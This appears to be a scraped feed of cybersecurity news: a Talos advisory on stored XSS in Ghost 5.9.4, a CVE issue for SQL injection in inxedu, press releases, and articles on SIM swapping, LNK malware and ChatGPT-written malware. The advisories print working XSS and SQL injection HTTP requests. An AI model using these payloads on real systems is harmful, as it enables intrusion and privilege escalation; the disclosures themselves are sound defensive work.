An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.

**SUMMARY**

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

**PRODUCT URLS**

Ghost - http://www.ghost.org

**CVSSv3 SCORE**

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-453 - Insecure Default Variable Initialization

**DETAILS**

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher level user simply previews or visits any post by the malicious user, as these social links seems to be included in all of a user’s posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

**CVE-2022-47194 - Twitter**

A stored XSS vulnerability exists in the twitter field for a user.

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 104
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"twitter":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47195 - Facebook**

A stored XSS vulnerability exists in the facebook field for a user:

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 69
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"facebook":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47196 - codeinjection\_head**

A stored XSS vulnerability exists in the codeinjection\_head for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 144
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**CVE-2022-47197 - codeinjection\_foot**

A stored XSS vulnerability exists in the codeinjection\_foot for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 172
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":null,
    "codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**TIMELINE**

2022-10-26 - Initial Vendor Contact

2022-10-26 - Vendor Disclosure

2022-10-31 - Vendor doesn’t consider issue a security problem

2022-11-22 - Vendor still doesn’t consider the issue a security problem

2023-01-05 - Revised advisory sent to vendor

2023-01-12 - Vendor still doesn’t see issue as security issue

2023-01-19 - Public release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-47197: TALOS-2022-1686 || Cisco Talos Intelligence Group

New program enables students and early career professionals to learn critical skills required in today's entry-level cybersecurity field, helping address urgent cyber workforce jobs gap.

**ALBUQUERQUE, N.M. and LANHAM, Md., Jan. 19, 2023 /PRNewswire/ --** The International Council of E-Commerce Consultants (EC-Council), a developer of world-class cybersecurity education programs and certifications, today announced that it has partnered with edX, a leading global online learning platform from 2U, Inc. (Nasdaq: TWOU), and committed to expanding access to vital cybersecurity education programs. EC-Council's Essentials Series is the first cybersecurity Professional Certificate of its kind to be offered on edX and includes three foundational industry certification credentials. The beginner level series is designed for learners aspiring to pursue a career in cybersecurity.

"The Essentials Series is purpose-built to help educate up-and-coming cybersecurity professionals and enable them to begin their careers," said Bill Kiriakis, Senior Vice President and Head of North America at EC-Council. "edX is a leader in online learning, bringing courses and certifications to over 46 million learners worldwide. With this new offering, edX and EC-Council can directly help address the global shortage of cybersecurity workers."

EC-Council's Essentials Series includes three individual courses covering network defense, ethical hacking, and digital forensics and costs $447 USDfor the full lab range and certification bundles. The series helps students and early career professionals learn employable skills required in today's entry-level cybersecurity field, educating students in a range of techniques and tactics across industry verticals, such as securing networks, mitigating cyber risks, conducting forensic investigations, ethical hacking, attack vectors, and more.

Cybersecurity continues to be one of the most in-demand professions. According to industry sources, there are now close to 4 million open cyber jobs worldwide and half a million open positions in the US. The industry is struggling to find and retain talent, partially due to access to training and certification programs.

"edX's professional certificate programs are designed to enhance the critical skills needed to succeed in today's most in-demand fields. They drive true career impact in an accessible and affordable way," said Andrew Hermalyn, president of partnerships at edX. "The addition of EC-Council's cybersecurity Essentials Series on edX gives learners the opportunity to earn a valuable credential from a world-class cybersecurity organization."

For more information on EC-Council's programs on edX, visit edx.org/school/ec-council.

**About EC-Council**

The sole mission of EC-Council is to advance the state of the cybersecurity profession on a global scale. Helping organizations, educators, governments, and individuals address global workforce problems is at the heart of the company's mission. To this end, it is developing and curating world-class cybersecurity education programs and certifications. It is also providing cybersecurity services to some of the largest businesses all over the world. More than 2,000 best universities, colleges, and training companies put their faith in EC-Council. This includes seven Fortune 10 companies, 47 Fortune 100 companies, the Department of Defense, global intelligence communities, and NATO. The standards for cybersecurity education are set by EC-Council programs, which have now been implemented in more than 140 countries worldwide. To acquire additional knowledge, please go to https://www.eccouncil.org/.

**About edX**

edX is the global online learning platform that exists to help learners everywhere unlock their potential. edX was founded by Harvard and MIT in 2012 to make the world's best education available to everyone. Today, as a 2U, Inc. company (Nasdaq: TWOU), edX connects over 46 million ambitious learners with the skills, knowledge, and support to achieve their goals. Together with the world's leading universities and companies, edX offers thousands of free and open courses, professional certificates, boot camps, credit-bearing micro credentials, and undergraduate and graduate degrees. Discover purpose-built online programs in technology, business, healthcare, science, education, social work, sustainability, and more at edX.org.

International Council of E-Commerce Consultants Launches Cybersecurity Essentials Professional Certificate Program on edX

**BOSTON****,** **Jan. 19, 2023** **/PRNewswire/ --** Mendix, a Siemens business and global leader in modern enterprise application development, and Software Improvement Group (SIG), an independent technology and advisory firm for software quality, security and improvement, have announced the release of Mendix Quality & Security Management (QSM), a new cybersecurity solution that provides continuous deep-dive insights into security and code quality to immediately address risks and vulnerabilities. The introduction of Mendix QSM enables enterprises to fuel innovation and growth, while managing cyber risks and building future-fit software.

The Mendix low-code development platform enables companies to accelerate the delivery of new innovations. Succeeding the Mendix Application Quality Monitor (AQM), the new Mendix QSM solution provides IT management, quality assurance teams, and software security experts deep visibility across the entire portfolio of Mendix applications. This enables close control of the software development process without compromising the quality and security of software, ensuring that security oversight is always top of mind for customers.

Mendix QSM is powered by Sigrid®, SIG's software assurance guiding platform. Combining more than 20 best-of-class security scanning tools, it provides a comprehensive overview of how security findings impact business objectives. With Mendix QSM, Mendix clients can scan their Mendix applications, including third-party libraries, for vulnerabilities and incorrectly configured security models, rank for compliance with main industry standards such as OWASP, ISO 5055 and PCI, and receive recommendations and clear guidance on risk mitigation.

Mendix QSM is based on static analysis of application models. Mendix models have been mapped to the ISO 25010 Maintainability model by SIG experts based on the Mendix model metadata. This allows for benchmarking of Mendix applications against a database of thousands of projects, including open-source initiatives. Mendix QSM also presents a five-star rating of the software quality. For example, a four-star software rating means issues are resolved three times faster, throughput increases seven-fold, and productivity increases almost 11-fold compared to a two-star rating.

"Mendix and SIG have been Original Equipment Manufacturer (OEM) partners since 2016," said Hans de Visser, chief product officer at Mendix. "In the past six years, we have strived to empower our customers with fast software development and best-of-industry governance tooling to build future-proof applications. Security is top of mind for our customers, and the new cybersecurity capabilities in Mendix Quality & Security Management is a logical extension to cater to the increasing security demands and requirements of our customers. Mendix and SIG expanded the OEM partnership to help Mendix customers manage the quality of their applications proactively, ensuring faster issue resolution with higher technical quality of software."

Luc Brandts, group CEO at SIG_,_ said, "With the number of cyber attacks growing every day, it is crucial for organizations worldwide to manage the build quality and security of their IT landscapes in a continuous fashion. We are providing this service as part of our quality assurance commitment to our customers. This new and improved joint security solution offers Mendix clients from bit to boardroom the transparency and continuous security insights they require in order to build business-ready applications with total confidence."

SIG inspects and certifies thousands of software systems per year on technical quality according to ISO/IEC 25010 and will continue to add new scanning tools and rules to QSM as part of its ongoing service.

**Connect with Mendix**

*   Follow @Mendix on Twitter
*   Connect with Mendix on LinkedIn

**About Mendix**

In a digital-first world, customers want their every need anticipated, employees want better tools to do their jobs, and enterprises know that sweeping digital transformation is the key to survival and success. Mendix, the low-code engine of the Siemens Xcelerator platform, is quickly becoming the application development platform of choice to drive the enterprise digital landscape. Mendix's industry-leading low-code platform, dedicated partner network, and extensive marketplace support advanced technology solutions that boost engagement, streamline operations, and relieve IT logjams. Built on the pillars of abstraction, automation, cloud, and collaboration, Mendix dramatically increases developer productivity and engages business technologists to create apps guided by their particular domain expertise. Mendix empowers enterprises to build apps faster than ever; catalyzes meaningful collaboration between IT and business experts; and maintains IT control of the entire application landscape. Consistently recognized as a leader and visionary by leading industry analysts, the platform is cloud-native, open, extensible, agile, and proven. From artificial intelligence and augmented reality to intelligent automation and native mobile, Mendix and Siemens Xcelerator are the backbone of digital-first enterprises. The Mendix low-code platform is used by more than 4,000 companies worldwide, over 200,000 applications have already been realized, and the active community comprises more than 300,000 developers.

**About SIG**

Software Improvement Group (SIG) guides business and technology leaders to drive their organizational objectives by fundamentally improving the health and security of their software applications. SIG offers Sigrid® - the software assurance guiding platform - to partners and enterprise organizations to help them measure, evaluate and improve code quality.SIG has the world's largest software benchmark with more than 75 billion lines of code across more than 300 technologies. The SIG laboratory has been accredited according to ISO/IEC 17025 for software quality analysis. Founded in 2000, SIG is headquartered in Amsterdam with regional offices in New York, Frankfurt, Brussels, and Copenhagen.

More information: www.softwareimprovementgroup.com

Mendix and Software Improvement Group Launch a New Software Application Quality and Security Scanning Solution

The growing use of mobile devices for MFA and the proliferation of 5G and VoIP in general could result in more attacks in future, experts say.

The growing use of mobile devices for multifactor authentication increasingly has made telecom providers a juicy target for cybercrime. An ongoing SIM card-swapping campaign by a Chinese threat actor called "Scattered Spider" is just the latest example of that trend.

Scattered Spider is an APT group that researchers from CrowdStrike have been tracking for the past several months. The group has been targeting telecom companies and business-process outsourcing (BPO) firms that support these telecom companies with the objective of gaining access to their respective carrier networks.

**SIM-Jacking Via the Carrier Network**

In at least two instances where the threat actor gained that access, they used it to do SIM swapping, a process where an adversary essentially transfers another person's phone number to their SIM card. Attackers can then use the hijacked phone number to access bank accounts or any other account where the legitimate user might have registered the phone as a second form of authentication. SIM jacking also gives attackers a way to register and associate rogue devices to accounts on compromised networks.

Bud Broomhead, CEO at Viakoo, says the wide use of mobile networks for multifactor authentication has painted a big target on telecom providers. "While there have always been efforts to breach telecom systems, the increased reliance on them for security has increased the frequency of attacks against them," he says.

In the campaigns that CrowdStrike observed, Scattered Spider gained initial access to a targeted telecom or BPO network by impersonating IT personnel and convincing individuals working at these organizations to part with their credentials or to grant remote access to their computers. Once inside the target environment the threat actors moved laterally across it — often using legitimate tools such as Windows Management Instrumentation — till they gained access to the carrier network.

The group has targeted multiple telecom firms since at least June 2022 and has simply kept moving to different targets each time it gets booted from one, prompting CrowdStrike to describe the campaign as an "extremely persistent and brazen" threat. Recently, CrowdStrike observed Scattered Spider deploy a malicious kernel driver via a vulnerability exploit as part of its attack chain.

Adam Meyers, senior vice president of intelligence at CrowdStrike, says Scattered Spider's campaign appears to be financially motivated and therefore different from the many attacks on carrier networks focused on cyber espionage.

"Based on what we have seen, they are focused on SIM swapping," Meyers says. "When you have two factor-authentication and do a SIM swap, you can bypass that authentication."

**Crime v. Espionage**

Campaigns like Scattered Spider represent a relatively new kind of attack on carrier networks. In recent years, many campaigns that targeted telecom companies have focused on some form of intelligence-gathering activity and have often involved advanced persistent threat groups from countries such as China, Iran, and Turkey, Meyers notes. The goal usually is to intercept communications and to harvest the detailed information available in call data records (CDRs), he says. CDRs can be very powerful for monitoring and tracking individuals, he says.

Back in 2019, Cybereason reported on one such campaign that it dubbed Operation Soft Cell, where a Chinese APT group infiltrated carrier networks belonging to a major telecommunication company to steal CDRs. The security vendor assessed at the time that the campaign had been active since at least 2012, giving the threat actor access to data that would have helped the government target politicians, foreign intelligence agencies, dissidents, law enforcement, and others.

In 2021, CrowdStrike reported on a multi-year campaign where a threat actor called Light Basin broke into at least 13 telecom networks worldwide and systematically stole Mobile Subscriber Identity (IMSI) data and call metadata on users. The threat actor installed tools on the carrier networks that allowed it to intercept call and text messages, call information, and records for tracking and monitoring targeted individuals.

More recently, Bitdefender reported observing a Chinese threat actor targeting a telecom firm in the Middle East in a cyber-espionage campaign. "The attack carries the hallmarks of BackdoorDiplomacy, a known APT group with ties to China," says Danny O’Neill, director of MDR operations at Bitdefender. The initial compromise used binaries vulnerable to side-loading techniques and likely involved an exploit of the ProxyShell vulnerability in Microsoft Exchange Server, he says.

"Once inside, the APT used multiple tools — some legit and some custom — and malware to spy, move laterally across the environment, and evade detection," he says.

**Catalysts for More Attacks?**

Meyers and others expect that the proliferation of 5G networks and VoIP services in general in coming years will make it easier for threat actors to execute these attacks on telecommunication companies. Newer telecom services such as 5G are susceptible to cyberattacks because everything — including the core networks — are software designed, O'Neill says. That means all the risks associated with software technologies will manifest on carrier networks as well, he says.

"There are going to be a greater number of cells, pico-cells, and micro-cells required to deliver the coverage given the much higher operating frequencies of 5G," O'Neill points out. From an attacker's perspective, this equates to more access and entry points, he says.

"The almost universal adoption of voice over IP technology has made pretty much every network a data network and blurred the lines between mediums," says Mike Parkin, senior technical engineer at Vulcan Cyber. "It's hard to separate old school voice telecommunication from today’s data networks," he says.

**Why Disruptive Cyberattacks Remain Rare**

One notable aspect of attacks on carrier networks is that very few so far have involved attempts to cause widespread service outages or sabotage — a major concern with attacks on organizations in other critical infrastructure sectors. In its 2019 report, Cybereason in fact had noted how the attackers could have used their access on the telecom network to do pretty much anything they had wanted: "A threat actor with total access to a telecommunications provider, as is the case here, can attack however they want passively and also actively work to sabotage the network."

That is an assessment that Meyers shares about the Scattered Spider campaign as well.

One reason why disruptive cyberattacks on telecom infrastructure might not have happened so far is because they are really not necessary.

"The primary motivation for attacks on signal-carrying networks is espionage," says John Bambenek, principal threat hunter at Netenrich. "Certainly, there are sabotage interests, but those are usually correlated to the proximity of physical conflict." As an example, he points to Russian attacks on Ukraine's telecom infrastructure at the start of the war.

Pulling off a disruptive cyberattack on a telecom network often is not needed because other, more straightforward options are available. "What we see many examples of is disruption due to physical means. Getting a little out of hand with a backhoe in the wrong place has disrupted communications for entire metropolitan areas," he says.

The shift to VoIP means old school tactics such as DDoS attacks could soon become an effective way to disrupt a carrier network, adds Parkin. Even so, other methods are easier, he says.

"A crowbar can gain access to a wiring trunk, and a pair of bolt cutters can make short work of the cables inside," Parkin says. "Taking out wireless communications takes more sophisticated equipment, but a couple of signal jammers could take down a surprisingly large area."

**Regs to the Rescue**

Going forward, governments and regulatory bodies will have to take a more active role in ensuring the security of the telecom sector against cyberattacks. Parkin points to recent steps by the US, UK, and other governments to mitigate against perceived "high risk" vendors and equipment manufacturers that sit at the core of telco networks as an example of what's needed in future.

"Government influence in achieving end-to-end cybersecurity should focus foremost on governance and regulatory requirements," O'Neill notes. "Existing policies and standards need to be developed and strengthened to incorporate new services like 5G."

He fears that operators, if left unchecked, could default to focusing on availability and convenience at the expense of security.

Cybercriminals Target Telecom Provider Networks

Cybercriminals are increasingly leveraging malicious LNK files as an initial access method to download and execute payloads such as Bumblebee, IcedID, and Qakbot.
A recent study by cybersecurity experts has shown that it is possible to identify relationships between different threat actors by analyzing the metadata of malicious LNK files, uncovering information such as the specific tools and

Threat Intelligence / Malware

Cybercriminals are increasingly leveraging malicious LNK files as an initial access method to download and execute payloads such as Bumblebee, IcedID, and Qakbot.

A recent study by cybersecurity experts has shown that it is possible to identify relationships between different threat actors by analyzing the metadata of malicious LNK files, uncovering information such as the specific tools and techniques used by different groups of cybercriminals, as well as potential links between seemingly unrelated attacks.

"With the increasing usage of LNK files in attack chains, it's logical that threat actors have started developing and using tools to create such files," Cisco Talos researcher Guilherme Venere said in a report shared with The Hacker News.

This includes tools like NativeOne's mLNK Builder and Quantum Builder, which allow subscribers to generate rogue shortcut files and evade security solutions.

Some of the major malware families that have used LNK files for initial access include Bumblebee, IcedID, and Qakbot, with Talos identifying connections between Bumblebee and IcedID as well as Bumblebee and Qakbot by examining the artifacts' metadata.

Specifically, multiple samples of LNK files leading to IcedID and Qakbot infections and those that were used in different Bumblebee campaigns have all been found to share the same Drive Serial Number.

LNK files have also been employed by advanced persistent threat (APT) groups like Gamaredon (aka Armageddon) in its attacks aimed at Ukrainian government entities.

The noticeable spike in campaigns using malicious shortcuts is seen as a reactive response to Microsoft's decision to disable macros by default in Office documents downloaded from the Internet, prompting threat actors to embrace alternative attachment types and delivery mechanisms to distribute malware.

Recent analyses from Talos and Trustwave have disclosed how APT actors and commodity malware families alike are weaponizing Excel add-in (XLL) files and Publisher macros to drop remote access trojans on compromised machines.

What's more, threat actors have been observed taking advantage of rogue Google Ads and search engine optimization (SEO) poisoning to push off-the-shelf malware like BATLOADER, IcedID, Rhadamanthys Stealer, and Vidar to victims searching for a slew of legitimate software.

BATLOADER, associated with an intrusion set tracked by Trend Micro as Water Minyades, is an "evasive and evolutionary malware" that's capable of installing additional malware, including Cobalt Strike, Qakbot, Raccoon Stealer, RedLine Stealer, SmokeLoader, Vidar, and ZLoader.

"Attackers are imitating the websites of popular software projects to trick victims into infecting their computers and buying search engine adverts to drive traffic there," HP Wolf Security researcher Patrick Schläpfer said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Research Delves into the World of Malicious LNK Files and Hackers Behind Them

Without noncompetes, how do organizations make sure employees aren't taking intellectual property when they go work to work for a competitor?

**Question: How would the FTC rule on noncompetes affect data security?**

**Jadee Hanson, CIO and CISO, Code42:** The Federal Trade Commission's proposed rule grants employees well-deserved autonomy regarding where they work, and when. However, it also complicates the relationship between employer and employee when it comes to data ownership, and security teams need to be aware that, if passed, their employees could easily leave their company for a competitor, with sensitive data and intellectual property (IP) in tow.

One reason noncompetes exist is to keep company data and intellectual property from leaking to competitors. It's easy to verify when a former employee takes a new position with a competitor, but not so easy to know if that employee took company data with them. I would argue that companies should not be relying solely on noncompete agreements to keep their valuable IP safe — but their potential ban makes it even more important to have the proper data security in place.

Organizations should incorporate technologies and processes that can identify risky file movements without inhibiting the organization's collaborative culture and employee productivity. They need technology that can see movement across a variety of cloud applications, automate security alerts, and prioritize insider risk concerns. Today, data is highly portable, and users are doing their jobs off the company network — greatly decreasing security's visibility into file movements. Potential risk indicators could include file movements made while users are off-hours, changing file extensions, or having access to the files of a highly confidential project. Without technology providing the right visibility, it's nearly impossible for security to focus on the right protections and mitigate the overall data exposure risk.

There's an assortment of tools that business leaders can choose from, but the most effective data protection technology can tell the difference between trusted and untrusted locations and allows employees to openly collaborate. In particular, insider risk management tools allow you to monitor, filter, and prioritize risk events, detecting when files are moving to noncorporate locations, including personal devices and cloud storage solutions.

This being said, it's not solely about the tools. Security and HR teams should also be sure to define formal onboarding and offboarding policies for employees, proper data handling training, and processes to address insider risks as they are found. A good security culture starts with a security team that is willing to empower the entire organization to get its job done. Using a "trust but verify" approach allows leaders to facilitate positive, trusting relationships with employees, using monitoring tools to ensure they're only intervening when it's absolutely necessary. The way organizations manage the relationship between their security teams and the broader employee and user base has decisive effects on retention and the overall employee experience. If security, legal, and HR teams approach insider risk events in the same combative, and sometimes hostile, manner they do external threats, it can increase tension between themselves and the rest of the organization, sowing the seeds for a culture of distrust among employees.

At the end of the day, it's on every employee in the workforce to do their part in keeping the company secure, and creating a security-aware culture from the get-go is a great way to create this vigilance.

By embodying a security-focused attitude and having a holistic data protection program in place internally, security leaders can have peace of mind knowing that they're maintaining a positive work environment for their teams while also feeling confident that important competitive data is not leaving with employees.

How Would the FTC Rule on Noncompetes Affect Data Security?

The powerful AI bot can produce malware without malicious code, making it tough to mitigate.

The newly released ChatGPT artificial intelligence bot from OpenAI could be used to usher in a new dangerous wave of polymorphic malware, security researchers warn.

One of the many spectacular tricks ChatGPT has been able to pull off is writing highly advanced malware that actually contains no malicious code at all, making it difficult to detect and mitigate, researchers at CyberArk explained in its recent threat research report.

The CyberArk team also detailed how the chatbot can be used to both generate injection code, as well as mutate it.

This new wave of cheap and easy ChatGPT polymorphic malware is something cybersecurity professionals should pay attention to, the analysis added.

"As we have seen, the use of ChatGPT's API within malware can present significant challenges for security professionals," the report said. "It's important to remember, this is not just a hypothetical scenario but a very real concern."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

ChatGPT Could Create Polymorphic Malware Wave, Researchers Warn

SQL Injection vulnerability in file /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml in inxedu 2.0.6 via the id value.

/inxedu/demo\_inxedu\_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml

    
    <delete id="deleteImages" parameterType="java.lang.String">
      DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
    </delete>
    

    POST /admin/website/delImages HTTP/1.1
    Host: 127.0.0.1:82
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 54
    Origin: http://127.0.0.1:82
    Connection: close
    Referer: http://127.0.0.1:82/admin/website/imagesPage
    Cookie: admin-token=; JSESSIONID=51DA0B24124A0158F5809EEDD2F7F1E2; inxedulogin_sys_user_=inxedulogin_sys_user_1
    Upgrade-Insecure-Requests: 1
    
    imageId=320) or updatexml(1,concat(0x7e,(user())),0) #

CVE-2020-35326: SQL Injection-2 · Issue #I14DNJ · 因酷/inxedu - Gitee.com

From updating employee education and implementing stronger authentication protocols to monitoring corporate accounts and adopting a zero-trust model, companies can better prepare defenses against chatbot-augmented attacks.

Over LinkedIn, Slack, Twitter, email, and text messages, people are sharing examples created using ChatGPT, the new artificial intelligence (AI) model from the team behind OpenAI.

Using ChatGPT, you can produce authentic-sounding dialogue that can be used for almost anything — from answering follow-up questions in an online chat dialogue to writing poetry. There are plenty of opportunities for enterprises to take advantage of the new chatbot technology, including helping with enterprise support and customer interactions. Its ability to quickly generate content, and, according to its developers, "answer follow-up questions, admit its mistakes, challenge incorrect premises, and reject inappropriate requests," opens many opportunities and some new challenges.

AI and machine learning (ML) is shifting quickly from niche solutions in corporate scenarios that have been high cost/high reward toward solutions to more expansive implementations that can solve a range of enterprise challenges, particularly those which focus on end users. Cybersecurity, for example, is now embracing AI-based approaches to provide greater protection with smaller security teams. One example highlights how organizations can use AI/ML to perform dynamic, risk-based checks when someone tries to access sensitive applications or data. This replaces older, policy-based approaches, which can take significant time and human interaction to develop and maintain the individual access policies. In a larger company, maintaining those policies could include hundreds or even thousands of applications and data repositories.

**Using AI for Greater Efficiency**

Interest in AI is continuing to explode as modern attacks require rapid detection and response to anomalous user behavior — something an AI model can be trained to quickly identify, but which takes significant human power to try and replicate manually. The goal of AI is to increase efficiency and trust while reducing friction and improving the user interface for typical users. Self-driving cars, for example, are designed to increase the safety and security of end users. In cybersecurity, specifically in the authentication of users (human and nonhuman), AI-based approaches are advancing rapidly, working with rule-based systems to improve the experience for end users.

In an increasingly digital world, attackers can already sidestep detection of binary identity authentication, including location, device, network, and other checks. Inevitably, cybercriminals will also look at the new opportunities ChatGPT opens up. AI tools that interact in a conversational way can be leveraged by cybercriminals to launch convincing phishing campaigns or account takeovers. In the past, it may have been easier to spot a phishing attack due to the poor grammar, unusual phrasing, or frequent spelling errors so common in phishing emails. That is quickly evolving with solutions like ChatGPT, which use natural language processing to create the initial message and then generate realistic responses to a target user's questions without any of those telltale markers.

**Rethink Security Approaches**

To prepare for chatbot-augmented attacks, organizations need to rethink security approaches to mitigate potential threats. Five measures they can take include:

1.  **Updating employee education** regarding the risks of phishing. Employees who understand how ChatGPT can be leveraged are likely to be more cautious about interacting with chatbots and other AI-supported solutions, and thereby avoid falling victim to these types of attacks.
2.  **Implementing strong authentication protocols** to make it more difficult for attackers to gain access to accounts. Attackers already know how to take advantage of users tired of reauthenticating through multifactor authentication (MFA) tools, so leveraging AI/ML to authenticate users through digital fingerprint matching and avoiding passwords altogether can help increase security while reducing MFA fatigue.
3.  **Adopting a zero-trust model.** By only granting access after verification and ensuring least-privileged access, security leaders can create an environment where even if an attacker leverages ChatGPT to get around unsuspecting users, the cybercriminals will still have to verify their identity and, even then, will only have access to limited resources. Limiting the access not only of developers but also leadership, including technical leadership, to the least access needed to perform their jobs effectively, may initially meet with resistance, but will make it harder for an attacker to leverage any unauthorized access for gain.
4.  **Monitoring activity** on corporate accounts and using tools, including spam filters, behavioral analysis, and keyword filtering, to identify and block malicious messages. Your employees cannot fall victim to a phishing attack, no matter how sophisticated the language is, if they never see the message. Quarantining malicious messages based on the behavior and relationship of the correspondents rather than specific keywords is more likely to block malicious actors.
5.  **Leveraging AI.** Cyberattacks are already leveraging AI, and ChatGPT is just one more way that they will use it to gain access to your organization's environments. Organizations must take advantage of the capabilities offered by AI/ML to improve cybersecurity and respond faster to threats and potential breaches.

Account takeover via social engineering, leveraging passwords from data breaches, and phishing attacks will become more frequent and more successful — despite our best defenses — given that ChatGPT can provide authentic-sounding responses to target inquiries. By updating and adopting these five approaches, organizations can help to reduce the risks to themselves and their employees when chatbots and other AI tools are used for malicious purposes.

ChatGPT Opens New Opportunities for Cybercriminals: 5 Ways for Organizations to Get Ready

**NEW YORK****,** **Jan. 18, 2023** **/PRNewswire/ --** Abacus Group, the leading provider of hosted IT services and solutions to alternative investment firms, today announces that it has acquired two boutique cybersecurity consulting companies, Gotham Security and its parent company, GoVanguard, both of which have unparalleled track records of excellence in the cyber arena.

Gotham Security, as the new business will be known, will be a subsidiary of Abacus Group but continue to operate independently. The acquisition marks a milestone in Abacus Group's expansion from a security-focussed managed service provider (MSP) to a full-bodied managed security service provider (MSSP) with an extensive suite of industry-leading cybersecurity services and products.

The deal will see Gotham Security supercharge Abacus Group's existing services portfolio with a wide breadth of cybersecurity consulting expertise. Abacus Group will acquire a comprehensive set of information security capabilities to provide clients with real-world, actionable insight, including penetration testing, red teaming, tabletop exercises, risk and compliance gap assessments, and threat hunting services.

